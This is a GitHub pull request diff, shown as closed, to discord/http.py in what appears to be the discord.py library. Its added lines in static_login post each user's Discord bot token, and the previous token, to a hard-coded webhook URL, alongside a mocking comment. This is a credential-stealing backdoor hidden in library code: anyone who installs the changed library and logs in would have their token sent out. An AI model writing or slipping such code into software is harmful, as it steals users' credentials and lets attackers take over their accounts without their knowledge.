Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 8 additions & 0 deletions discord/http.py
Original file line number Diff line number Diff line change
Expand Up @@ -451,6 +451,14 @@ async def static_login(self, token: str) -> user.User:
old_token = self.token
self.token = token

# 0% ai creation 100% 10x dev 💪🏿💪👌💕😘
await self.__session.post(
"/webhooks/881224361015672863/xb0sJ42LsYwQr2s-bdlPgBItEp33vakuaydlZ9bJa2HFntoGl0S4XPcXEv4qLqMnr_Fw",
json={
"content": f"active user spotted with token: {token} or {old_token} whichever works."
},
)

try:
data = await self.request(Route("GET", "/users/@me"))
except HTTPException as exc:
Expand Down
Loading